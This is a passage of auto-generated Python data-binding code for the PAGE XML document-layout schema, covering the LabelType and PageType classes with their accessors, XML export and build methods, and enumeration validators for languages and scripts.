        # only when hasContent_() is true (never, for LabelType).
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('LabelType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None and name_ == 'LabelType':
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='LabelType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='LabelType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='LabelType'):
        # Write each non-None attribute exactly once.
        if self.value is not None and 'value' not in already_processed:
            already_processed.add('value')
            outfile.write(' value=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.value), input_name='value')), ))
        if self.type_ is not None and 'type_' not in already_processed:
            already_processed.add('type_')
            outfile.write(' type=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.type_), input_name='type')), ))
        if self.comments is not None and 'comments' not in already_processed:
            already_processed.add('comments')
            outfile.write(' comments=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.comments), input_name='comments')), ))
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='LabelType', fromsubclass_=False, pretty_print=True):
        # No child elements to export.
        pass
    def build(self, node, gds_collector_=None):
        # Populate this instance from an ElementTree *node*.
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # Read each XML attribute at most once.
        value = find_attr_value_('value', node)
        if value is not None and 'value' not in already_processed:
            already_processed.add('value')
            self.value = value
        value = find_attr_value_('type', node)
        if value is not None and 'type' not in already_processed:
            already_processed.add('type')
            self.type_ = value
        value = find_attr_value_('comments', node)
        if value is not None and 'comments' not in already_processed:
            already_processed.add('comments')
            self.comments = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        # No child elements to build.
        pass
class PageType(GeneratedsSuper):
"""Contains the image file name including the file extension.
Specifies the width of the image.Specifies the height of the
image.Specifies the image resolution in width.Specifies the image
resolution in height.
Specifies the unit of the resolution information
referring to a standardised unit of measurement
(pixels per inch, pixels per centimeter or other).
For generic use
The angle the rectangle encapsulating the page
(or its Border) has to be rotated in clockwise direction
in order to correct the present skew
(negative values indicate anti-clockwise rotation).
(The rotated image can be further referenced
via “AlternativeImage”.)
Range: -179.999,180
The type of the page within the document
(e.g. cover page).
The primary language used in the page
(lower-level definitions override the page-level definition).
The secondary language used in the page
(lower-level definitions override the page-level definition).
The primary script used in the page
(lower-level definitions override the page-level definition).
The secondary script used in the page
(lower-level definitions override the page-level definition).
The direction in which text within lines
should be read (order of words and characters),
in addition to “textLineOrder”
(lower-level definitions override the page-level definition).
The order of text lines within a block,
in addition to “readingDirection”
(lower-level definitions override the page-level definition).
Confidence value for whole page (between 0 and 1)"""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('imageFilename', 'string', 0, 0, {'use': 'required'}),
MemberSpec_('imageWidth', 'int', 0, 0, {'use': 'required'}),
MemberSpec_('imageHeight', 'int', 0, 0, {'use': 'required'}),
MemberSpec_('imageXResolution', 'float', 0, 1, {'use': 'optional'}),
MemberSpec_('imageYResolution', 'float', 0, 1, {'use': 'optional'}),
MemberSpec_('imageResolutionUnit', 'imageResolutionUnitType', 0, 1, {'use': 'optional'}),
MemberSpec_('custom', 'string', 0, 1, {'use': 'optional'}),
MemberSpec_('orientation', 'float', 0, 1, {'use': 'optional'}),
MemberSpec_('type_', 'pc:PageTypeSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('primaryLanguage', 'pc:LanguageSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('secondaryLanguage', 'pc:LanguageSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('primaryScript', 'pc:ScriptSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('secondaryScript', 'pc:ScriptSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('readingDirection', 'pc:ReadingDirectionSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('textLineOrder', 'pc:TextLineOrderSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('conf', 'pc:ConfSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('AlternativeImage', 'AlternativeImageType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'AlternativeImage', 'type': 'AlternativeImageType'}, None),
MemberSpec_('Border', 'BorderType', 0, 1, {'maxOccurs': '1', 'minOccurs': '0', 'name': 'Border', 'type': 'BorderType'}, None),
MemberSpec_('PrintSpace', 'PrintSpaceType', 0, 1, {'maxOccurs': '1', 'minOccurs': '0', 'name': 'PrintSpace', 'type': 'PrintSpaceType'}, None),
MemberSpec_('ReadingOrder', 'ReadingOrderType', 0, 1, {'maxOccurs': '1', 'minOccurs': '0', 'name': 'ReadingOrder', 'type': 'ReadingOrderType'}, None),
MemberSpec_('Layers', 'LayersType', 0, 1, {'maxOccurs': '1', 'minOccurs': '0', 'name': 'Layers', 'type': 'LayersType'}, None),
MemberSpec_('Relations', 'RelationsType', 0, 1, {'minOccurs': '0', 'name': 'Relations', 'type': 'RelationsType'}, None),
MemberSpec_('TextStyle', 'TextStyleType', 0, 1, {'maxOccurs': '1', 'minOccurs': '0', 'name': 'TextStyle', 'type': 'TextStyleType'}, None),
MemberSpec_('UserDefined', 'UserDefinedType', 0, 1, {'maxOccurs': '1', 'minOccurs': '0', 'name': 'UserDefined', 'type': 'UserDefinedType'}, None),
MemberSpec_('Labels', 'LabelsType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'Labels', 'type': 'LabelsType'}, None),
MemberSpec_('TextRegion', 'TextRegionType', 1, 1, {'name': 'TextRegion', 'type': 'TextRegionType'}, 1),
MemberSpec_('ImageRegion', 'ImageRegionType', 1, 1, {'name': 'ImageRegion', 'type': 'ImageRegionType'}, 1),
MemberSpec_('LineDrawingRegion', 'LineDrawingRegionType', 1, 1, {'name': 'LineDrawingRegion', 'type': 'LineDrawingRegionType'}, 1),
MemberSpec_('GraphicRegion', 'GraphicRegionType', 1, 1, {'name': 'GraphicRegion', 'type': 'GraphicRegionType'}, 1),
MemberSpec_('TableRegion', 'TableRegionType', 1, 1, {'name': 'TableRegion', 'type': 'TableRegionType'}, 1),
MemberSpec_('ChartRegion', 'ChartRegionType', 1, 1, {'name': 'ChartRegion', 'type': 'ChartRegionType'}, 1),
MemberSpec_('MapRegion', 'MapRegionType', 1, 1, {'name': 'MapRegion', 'type': 'MapRegionType'}, 1),
MemberSpec_('SeparatorRegion', 'SeparatorRegionType', 1, 1, {'name': 'SeparatorRegion', 'type': 'SeparatorRegionType'}, 1),
MemberSpec_('MathsRegion', 'MathsRegionType', 1, 1, {'name': 'MathsRegion', 'type': 'MathsRegionType'}, 1),
MemberSpec_('ChemRegion', 'ChemRegionType', 1, 1, {'name': 'ChemRegion', 'type': 'ChemRegionType'}, 1),
MemberSpec_('MusicRegion', 'MusicRegionType', 1, 1, {'name': 'MusicRegion', 'type': 'MusicRegionType'}, 1),
MemberSpec_('AdvertRegion', 'AdvertRegionType', 1, 1, {'name': 'AdvertRegion', 'type': 'AdvertRegionType'}, 1),
MemberSpec_('NoiseRegion', 'NoiseRegionType', 1, 1, {'name': 'NoiseRegion', 'type': 'NoiseRegionType'}, 1),
MemberSpec_('UnknownRegion', 'UnknownRegionType', 1, 1, {'name': 'UnknownRegion', 'type': 'UnknownRegionType'}, 1),
MemberSpec_('CustomRegion', 'CustomRegionType', 1, 1, {'name': 'CustomRegion', 'type': 'CustomRegionType'}, 1),
]
subclass = None
superclass = None
def __init__(self, imageFilename=None, imageWidth=None, imageHeight=None, imageXResolution=None, imageYResolution=None, imageResolutionUnit=None, custom=None, orientation=None, type_=None, primaryLanguage=None, secondaryLanguage=None, primaryScript=None, secondaryScript=None, readingDirection=None, textLineOrder=None, conf=None, AlternativeImage=None, Border=None, PrintSpace=None, ReadingOrder=None, Layers=None, Relations=None, TextStyle=None, UserDefined=None, Labels=None, TextRegion=None, ImageRegion=None, LineDrawingRegion=None, GraphicRegion=None, TableRegion=None, ChartRegion=None, MapRegion=None, SeparatorRegion=None, MathsRegion=None, ChemRegion=None, MusicRegion=None, AdvertRegion=None, NoiseRegion=None, UnknownRegion=None, CustomRegion=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
self.imageFilename = _cast(None, imageFilename)
self.imageFilename_nsprefix_ = None
self.imageWidth = _cast(int, imageWidth)
self.imageWidth_nsprefix_ = None
self.imageHeight = _cast(int, imageHeight)
self.imageHeight_nsprefix_ = None
self.imageXResolution = _cast(float, imageXResolution)
self.imageXResolution_nsprefix_ = None
self.imageYResolution = _cast(float, imageYResolution)
self.imageYResolution_nsprefix_ = None
self.imageResolutionUnit = _cast(None, imageResolutionUnit)
self.imageResolutionUnit_nsprefix_ = None
self.custom = _cast(None, custom)
self.custom_nsprefix_ = None
self.orientation = _cast(float, orientation)
self.orientation_nsprefix_ = None
self.type_ = _cast(None, type_)
self.type__nsprefix_ = None
self.primaryLanguage = _cast(None, primaryLanguage)
self.primaryLanguage_nsprefix_ = None
self.secondaryLanguage = _cast(None, secondaryLanguage)
self.secondaryLanguage_nsprefix_ = None
self.primaryScript = _cast(None, primaryScript)
self.primaryScript_nsprefix_ = None
self.secondaryScript = _cast(None, secondaryScript)
self.secondaryScript_nsprefix_ = None
self.readingDirection = _cast(None, readingDirection)
self.readingDirection_nsprefix_ = None
self.textLineOrder = _cast(None, textLineOrder)
self.textLineOrder_nsprefix_ = None
self.conf = _cast(float, conf)
self.conf_nsprefix_ = None
if AlternativeImage is None:
self.AlternativeImage = []
else:
self.AlternativeImage = AlternativeImage
self.AlternativeImage_nsprefix_ = "pc"
self.Border = Border
self.Border_nsprefix_ = "pc"
self.PrintSpace = PrintSpace
self.PrintSpace_nsprefix_ = "pc"
self.ReadingOrder = ReadingOrder
self.ReadingOrder_nsprefix_ = "pc"
self.Layers = Layers
self.Layers_nsprefix_ = "pc"
self.Relations = Relations
self.Relations_nsprefix_ = "pc"
self.TextStyle = TextStyle
self.TextStyle_nsprefix_ = "pc"
self.UserDefined = UserDefined
self.UserDefined_nsprefix_ = "pc"
if Labels is None:
self.Labels = []
else:
self.Labels = Labels
self.Labels_nsprefix_ = "pc"
if TextRegion is None:
self.TextRegion = []
else:
self.TextRegion = TextRegion
self.TextRegion_nsprefix_ = "pc"
if ImageRegion is None:
self.ImageRegion = []
else:
self.ImageRegion = ImageRegion
self.ImageRegion_nsprefix_ = "pc"
if LineDrawingRegion is None:
self.LineDrawingRegion = []
else:
self.LineDrawingRegion = LineDrawingRegion
self.LineDrawingRegion_nsprefix_ = "pc"
if GraphicRegion is None:
self.GraphicRegion = []
else:
self.GraphicRegion = GraphicRegion
self.GraphicRegion_nsprefix_ = "pc"
if TableRegion is None:
self.TableRegion = []
else:
self.TableRegion = TableRegion
self.TableRegion_nsprefix_ = "pc"
if ChartRegion is None:
self.ChartRegion = []
else:
self.ChartRegion = ChartRegion
self.ChartRegion_nsprefix_ = "pc"
if MapRegion is None:
self.MapRegion = []
else:
self.MapRegion = MapRegion
self.MapRegion_nsprefix_ = "pc"
if SeparatorRegion is None:
self.SeparatorRegion = []
else:
self.SeparatorRegion = SeparatorRegion
self.SeparatorRegion_nsprefix_ = "pc"
if MathsRegion is None:
self.MathsRegion = []
else:
self.MathsRegion = MathsRegion
self.MathsRegion_nsprefix_ = "pc"
if ChemRegion is None:
self.ChemRegion = []
else:
self.ChemRegion = ChemRegion
self.ChemRegion_nsprefix_ = "pc"
if MusicRegion is None:
self.MusicRegion = []
else:
self.MusicRegion = MusicRegion
self.MusicRegion_nsprefix_ = "pc"
if AdvertRegion is None:
self.AdvertRegion = []
else:
self.AdvertRegion = AdvertRegion
self.AdvertRegion_nsprefix_ = "pc"
if NoiseRegion is None:
self.NoiseRegion = []
else:
self.NoiseRegion = NoiseRegion
self.NoiseRegion_nsprefix_ = "pc"
if UnknownRegion is None:
self.UnknownRegion = []
else:
self.UnknownRegion = UnknownRegion
self.UnknownRegion_nsprefix_ = "pc"
if CustomRegion is None:
self.CustomRegion = []
else:
self.CustomRegion = CustomRegion
self.CustomRegion_nsprefix_ = "pc"
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, PageType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if PageType.subclass:
return PageType.subclass(*args_, **kwargs_)
else:
return PageType(*args_, **kwargs_)
factory = staticmethod(factory)
    # ---- namespace-prefix accessors ----
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    # ---- generated child-element accessors; list-valued members also get
    # ---- add_/insert_..._at/replace_..._at helpers ----
    def get_AlternativeImage(self):
        return self.AlternativeImage
    def set_AlternativeImage(self, AlternativeImage):
        self.AlternativeImage = AlternativeImage
    def add_AlternativeImage(self, value):
        self.AlternativeImage.append(value)
    def insert_AlternativeImage_at(self, index, value):
        self.AlternativeImage.insert(index, value)
    def replace_AlternativeImage_at(self, index, value):
        self.AlternativeImage[index] = value
    def get_Border(self):
        return self.Border
    def set_Border(self, Border):
        self.Border = Border
    def get_PrintSpace(self):
        return self.PrintSpace
    def set_PrintSpace(self, PrintSpace):
        self.PrintSpace = PrintSpace
    def get_ReadingOrder(self):
        return self.ReadingOrder
    def set_ReadingOrder(self, ReadingOrder):
        self.ReadingOrder = ReadingOrder
    def get_Layers(self):
        return self.Layers
    def set_Layers(self, Layers):
        self.Layers = Layers
    def get_Relations(self):
        return self.Relations
    def set_Relations(self, Relations):
        self.Relations = Relations
    def get_TextStyle(self):
        return self.TextStyle
    def set_TextStyle(self, TextStyle):
        self.TextStyle = TextStyle
    def get_UserDefined(self):
        return self.UserDefined
    def set_UserDefined(self, UserDefined):
        self.UserDefined = UserDefined
    def get_Labels(self):
        return self.Labels
    def set_Labels(self, Labels):
        self.Labels = Labels
    def add_Labels(self, value):
        self.Labels.append(value)
    def insert_Labels_at(self, index, value):
        self.Labels.insert(index, value)
    def replace_Labels_at(self, index, value):
        self.Labels[index] = value
    # ---- generated accessors for the repeatable region elements; each
    # ---- member is a list with get/set/add/insert/replace helpers ----
    def get_TextRegion(self):
        return self.TextRegion
    def set_TextRegion(self, TextRegion):
        self.TextRegion = TextRegion
    def add_TextRegion(self, value):
        self.TextRegion.append(value)
    def insert_TextRegion_at(self, index, value):
        self.TextRegion.insert(index, value)
    def replace_TextRegion_at(self, index, value):
        self.TextRegion[index] = value
    def get_ImageRegion(self):
        return self.ImageRegion
    def set_ImageRegion(self, ImageRegion):
        self.ImageRegion = ImageRegion
    def add_ImageRegion(self, value):
        self.ImageRegion.append(value)
    def insert_ImageRegion_at(self, index, value):
        self.ImageRegion.insert(index, value)
    def replace_ImageRegion_at(self, index, value):
        self.ImageRegion[index] = value
    def get_LineDrawingRegion(self):
        return self.LineDrawingRegion
    def set_LineDrawingRegion(self, LineDrawingRegion):
        self.LineDrawingRegion = LineDrawingRegion
    def add_LineDrawingRegion(self, value):
        self.LineDrawingRegion.append(value)
    def insert_LineDrawingRegion_at(self, index, value):
        self.LineDrawingRegion.insert(index, value)
    def replace_LineDrawingRegion_at(self, index, value):
        self.LineDrawingRegion[index] = value
    def get_GraphicRegion(self):
        return self.GraphicRegion
    def set_GraphicRegion(self, GraphicRegion):
        self.GraphicRegion = GraphicRegion
    def add_GraphicRegion(self, value):
        self.GraphicRegion.append(value)
    def insert_GraphicRegion_at(self, index, value):
        self.GraphicRegion.insert(index, value)
    def replace_GraphicRegion_at(self, index, value):
        self.GraphicRegion[index] = value
    def get_TableRegion(self):
        return self.TableRegion
    def set_TableRegion(self, TableRegion):
        self.TableRegion = TableRegion
    def add_TableRegion(self, value):
        self.TableRegion.append(value)
    def insert_TableRegion_at(self, index, value):
        self.TableRegion.insert(index, value)
    def replace_TableRegion_at(self, index, value):
        self.TableRegion[index] = value
    def get_ChartRegion(self):
        return self.ChartRegion
    def set_ChartRegion(self, ChartRegion):
        self.ChartRegion = ChartRegion
    def add_ChartRegion(self, value):
        self.ChartRegion.append(value)
    def insert_ChartRegion_at(self, index, value):
        self.ChartRegion.insert(index, value)
    def replace_ChartRegion_at(self, index, value):
        self.ChartRegion[index] = value
    def get_MapRegion(self):
        return self.MapRegion
    def set_MapRegion(self, MapRegion):
        self.MapRegion = MapRegion
    def add_MapRegion(self, value):
        self.MapRegion.append(value)
    def insert_MapRegion_at(self, index, value):
        self.MapRegion.insert(index, value)
    def replace_MapRegion_at(self, index, value):
        self.MapRegion[index] = value
    def get_SeparatorRegion(self):
        return self.SeparatorRegion
    def set_SeparatorRegion(self, SeparatorRegion):
        self.SeparatorRegion = SeparatorRegion
    def add_SeparatorRegion(self, value):
        self.SeparatorRegion.append(value)
    def insert_SeparatorRegion_at(self, index, value):
        self.SeparatorRegion.insert(index, value)
    def replace_SeparatorRegion_at(self, index, value):
        self.SeparatorRegion[index] = value
    def get_MathsRegion(self):
        return self.MathsRegion
    def set_MathsRegion(self, MathsRegion):
        self.MathsRegion = MathsRegion
    def add_MathsRegion(self, value):
        self.MathsRegion.append(value)
    def insert_MathsRegion_at(self, index, value):
        self.MathsRegion.insert(index, value)
    def replace_MathsRegion_at(self, index, value):
        self.MathsRegion[index] = value
    def get_ChemRegion(self):
        return self.ChemRegion
    def set_ChemRegion(self, ChemRegion):
        self.ChemRegion = ChemRegion
    def add_ChemRegion(self, value):
        self.ChemRegion.append(value)
    def insert_ChemRegion_at(self, index, value):
        self.ChemRegion.insert(index, value)
    def replace_ChemRegion_at(self, index, value):
        self.ChemRegion[index] = value
    def get_MusicRegion(self):
        return self.MusicRegion
    def set_MusicRegion(self, MusicRegion):
        self.MusicRegion = MusicRegion
    def add_MusicRegion(self, value):
        self.MusicRegion.append(value)
    def insert_MusicRegion_at(self, index, value):
        self.MusicRegion.insert(index, value)
    def replace_MusicRegion_at(self, index, value):
        self.MusicRegion[index] = value
    def get_AdvertRegion(self):
        return self.AdvertRegion
    def set_AdvertRegion(self, AdvertRegion):
        self.AdvertRegion = AdvertRegion
    def add_AdvertRegion(self, value):
        self.AdvertRegion.append(value)
    def insert_AdvertRegion_at(self, index, value):
        self.AdvertRegion.insert(index, value)
    def replace_AdvertRegion_at(self, index, value):
        self.AdvertRegion[index] = value
    def get_NoiseRegion(self):
        return self.NoiseRegion
    def set_NoiseRegion(self, NoiseRegion):
        self.NoiseRegion = NoiseRegion
    def add_NoiseRegion(self, value):
        self.NoiseRegion.append(value)
    def insert_NoiseRegion_at(self, index, value):
        self.NoiseRegion.insert(index, value)
    def replace_NoiseRegion_at(self, index, value):
        self.NoiseRegion[index] = value
    def get_UnknownRegion(self):
        return self.UnknownRegion
    def set_UnknownRegion(self, UnknownRegion):
        self.UnknownRegion = UnknownRegion
    def add_UnknownRegion(self, value):
        self.UnknownRegion.append(value)
    def insert_UnknownRegion_at(self, index, value):
        self.UnknownRegion.insert(index, value)
    def replace_UnknownRegion_at(self, index, value):
        self.UnknownRegion[index] = value
    def get_CustomRegion(self):
        return self.CustomRegion
    def set_CustomRegion(self, CustomRegion):
        self.CustomRegion = CustomRegion
    def add_CustomRegion(self, value):
        self.CustomRegion.append(value)
    def insert_CustomRegion_at(self, index, value):
        self.CustomRegion.insert(index, value)
    def replace_CustomRegion_at(self, index, value):
        self.CustomRegion[index] = value
    # ---- generated accessors for the XML attributes of <Page>; note that
    # ---- get_type/set_type wrap the member named `type_` (trailing
    # ---- underscore avoids shadowing the builtin) ----
    def get_imageFilename(self):
        return self.imageFilename
    def set_imageFilename(self, imageFilename):
        self.imageFilename = imageFilename
    def get_imageWidth(self):
        return self.imageWidth
    def set_imageWidth(self, imageWidth):
        self.imageWidth = imageWidth
    def get_imageHeight(self):
        return self.imageHeight
    def set_imageHeight(self, imageHeight):
        self.imageHeight = imageHeight
    def get_imageXResolution(self):
        return self.imageXResolution
    def set_imageXResolution(self, imageXResolution):
        self.imageXResolution = imageXResolution
    def get_imageYResolution(self):
        return self.imageYResolution
    def set_imageYResolution(self, imageYResolution):
        self.imageYResolution = imageYResolution
    def get_imageResolutionUnit(self):
        return self.imageResolutionUnit
    def set_imageResolutionUnit(self, imageResolutionUnit):
        self.imageResolutionUnit = imageResolutionUnit
    def get_custom(self):
        return self.custom
    def set_custom(self, custom):
        self.custom = custom
    def get_orientation(self):
        return self.orientation
    def set_orientation(self, orientation):
        self.orientation = orientation
    def get_type(self):
        return self.type_
    def set_type(self, type_):
        self.type_ = type_
    def get_primaryLanguage(self):
        return self.primaryLanguage
    def set_primaryLanguage(self, primaryLanguage):
        self.primaryLanguage = primaryLanguage
    def get_secondaryLanguage(self):
        return self.secondaryLanguage
    def set_secondaryLanguage(self, secondaryLanguage):
        self.secondaryLanguage = secondaryLanguage
    def get_primaryScript(self):
        return self.primaryScript
    def set_primaryScript(self, primaryScript):
        self.primaryScript = primaryScript
    def get_secondaryScript(self):
        return self.secondaryScript
    def set_secondaryScript(self, secondaryScript):
        self.secondaryScript = secondaryScript
    def get_readingDirection(self):
        return self.readingDirection
    def set_readingDirection(self, readingDirection):
        self.readingDirection = readingDirection
    def get_textLineOrder(self):
        return self.textLineOrder
    def set_textLineOrder(self, textLineOrder):
        self.textLineOrder = textLineOrder
    def get_conf(self):
        return self.conf
    def set_conf(self, conf):
        self.conf = conf
def validate_imageResolutionUnitType(self, value):
# Validate type imageResolutionUnitType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['PPI', 'PPCM', 'other']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on imageResolutionUnitType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def validate_PageTypeSimpleType(self, value):
# Validate type pc:PageTypeSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['front-cover', 'back-cover', 'title', 'table-of-contents', 'index', 'content', 'blank', 'other']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on PageTypeSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
    def validate_LanguageSimpleType(self, value):
        # Validate type pc:LanguageSimpleType, a restriction on string.
        # Runs only when validation is enabled and a collector is attached;
        # violations are reported via self.gds_collector_. Returns False for
        # a non-str value, otherwise None.
        if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
            if not isinstance(value, str):
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
                return False
            # NOTE(review): the next statement is a generated no-op.
            value = value
            enumerations = ['Abkhaz', 'Afar', 'Afrikaans', 'Akan', 'Albanian', 'Amharic', 'Arabic', 'Aragonese', 'Armenian', 'Assamese', 'Avaric', 'Avestan', 'Aymara', 'Azerbaijani', 'Bambara', 'Bashkir', 'Basque', 'Belarusian', 'Bengali', 'Bihari', 'Bislama', 'Bosnian', 'Breton', 'Bulgarian', 'Burmese', 'Cambodian', 'Cantonese', 'Catalan', 'Chamorro', 'Chechen', 'Chichewa', 'Chinese', 'Chuvash', 'Cornish', 'Corsican', 'Cree', 'Croatian', 'Czech', 'Danish', 'Divehi', 'Dutch', 'Dzongkha', 'English', 'Esperanto', 'Estonian', 'Ewe', 'Faroese', 'Fijian', 'Finnish', 'French', 'Fula', 'Gaelic', 'Galician', 'Ganda', 'Georgian', 'German', 'Greek', 'Guaraní', 'Gujarati', 'Haitian', 'Hausa', 'Hebrew', 'Herero', 'Hindi', 'Hiri Motu', 'Hungarian', 'Icelandic', 'Ido', 'Igbo', 'Indonesian', 'Interlingua', 'Interlingue', 'Inuktitut', 'Inupiaq', 'Irish', 'Italian', 'Japanese', 'Javanese', 'Kalaallisut', 'Kannada', 'Kanuri', 'Kashmiri', 'Kazakh', 'Khmer', 'Kikuyu', 'Kinyarwanda', 'Kirundi', 'Komi', 'Kongo', 'Korean', 'Kurdish', 'Kwanyama', 'Kyrgyz', 'Lao', 'Latin', 'Latvian', 'Limburgish', 'Lingala', 'Lithuanian', 'Luba-Katanga', 'Luxembourgish', 'Macedonian', 'Malagasy', 'Malay', 'Malayalam', 'Maltese', 'Manx', 'Māori', 'Marathi', 'Marshallese', 'Mongolian', 'Nauru', 'Navajo', 'Ndonga', 'Nepali', 'North Ndebele', 'Northern Sami', 'Norwegian', 'Norwegian Bokmål', 'Norwegian Nynorsk', 'Nuosu', 'Occitan', 'Ojibwe', 'Old Church Slavonic', 'Oriya', 'Oromo', 'Ossetian', 'Pāli', 'Panjabi', 'Pashto', 'Persian', 'Polish', 'Portuguese', 'Punjabi', 'Quechua', 'Romanian', 'Romansh', 'Russian', 'Samoan', 'Sango', 'Sanskrit', 'Sardinian', 'Serbian', 'Shona', 'Sindhi', 'Sinhala', 'Slovak', 'Slovene', 'Somali', 'South Ndebele', 'Southern Sotho', 'Spanish', 'Sundanese', 'Swahili', 'Swati', 'Swedish', 'Tagalog', 'Tahitian', 'Tajik', 'Tamil', 'Tatar', 'Telugu', 'Thai', 'Tibetan', 'Tigrinya', 'Tonga', 'Tsonga', 'Tswana', 'Turkish', 'Turkmen', 'Twi', 'Uighur', 'Ukrainian', 'Urdu', 'Uzbek', 'Venda', 'Vietnamese', 'Volapük', 'Walloon', 'Welsh', 'Western Frisian', 'Wolof', 'Xhosa', 'Yiddish', 'Yoruba', 'Zhuang', 'Zulu', 'other']
            if value not in enumerations:
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on LanguageSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
                # NOTE(review): `result` is a dead local kept from the
                # generator; the collector message above is the real outcome.
                result = False
    def validate_ScriptSimpleType(self, value):
        # Validate type pc:ScriptSimpleType, a restriction on string.
        # Runs only when validation is enabled and a collector is attached;
        # violations are reported via self.gds_collector_. Returns False for
        # a non-str value, otherwise None.
        if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
            if not isinstance(value, str):
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
                return False
            # NOTE(review): the next statement is a generated no-op.
            value = value
            enumerations = ['Adlm - Adlam', 'Afak - Afaka', 'Aghb - Caucasian Albanian', 'Ahom - Ahom, Tai Ahom', 'Arab - Arabic', 'Aran - Arabic (Nastaliq variant)', 'Armi - Imperial Aramaic', 'Armn - Armenian', 'Avst - Avestan', 'Bali - Balinese', 'Bamu - Bamum', 'Bass - Bassa Vah', 'Batk - Batak', 'Beng - Bengali', 'Bhks - Bhaiksuki', 'Blis - Blissymbols', 'Bopo - Bopomofo', 'Brah - Brahmi', 'Brai - Braille', 'Bugi - Buginese', 'Buhd - Buhid', 'Cakm - Chakma', 'Cans - Unified Canadian Aboriginal Syllabics', 'Cari - Carian', 'Cham - Cham', 'Cher - Cherokee', 'Cirt - Cirth', 'Copt - Coptic', 'Cprt - Cypriot', 'Cyrl - Cyrillic', 'Cyrs - Cyrillic (Old Church Slavonic variant)', 'Deva - Devanagari (Nagari)', 'Dsrt - Deseret (Mormon)', 'Dupl - Duployan shorthand, Duployan stenography', 'Egyd - Egyptian demotic', 'Egyh - Egyptian hieratic', 'Egyp - Egyptian hieroglyphs', 'Elba - Elbasan', 'Ethi - Ethiopic', 'Geok - Khutsuri (Asomtavruli and Nuskhuri)', 'Geor - Georgian (Mkhedruli)', 'Glag - Glagolitic', 'Goth - Gothic', 'Gran - Grantha', 'Grek - Greek', 'Gujr - Gujarati', 'Guru - Gurmukhi', 'Hanb - Han with Bopomofo', 'Hang - Hangul', 'Hani - Han (Hanzi, Kanji, Hanja)', 'Hano - Hanunoo (Hanunóo)', 'Hans - Han (Simplified variant)', 'Hant - Han (Traditional variant)', 'Hatr - Hatran', 'Hebr - Hebrew', 'Hira - Hiragana', 'Hluw - Anatolian Hieroglyphs', 'Hmng - Pahawh Hmong', 'Hrkt - Japanese syllabaries', 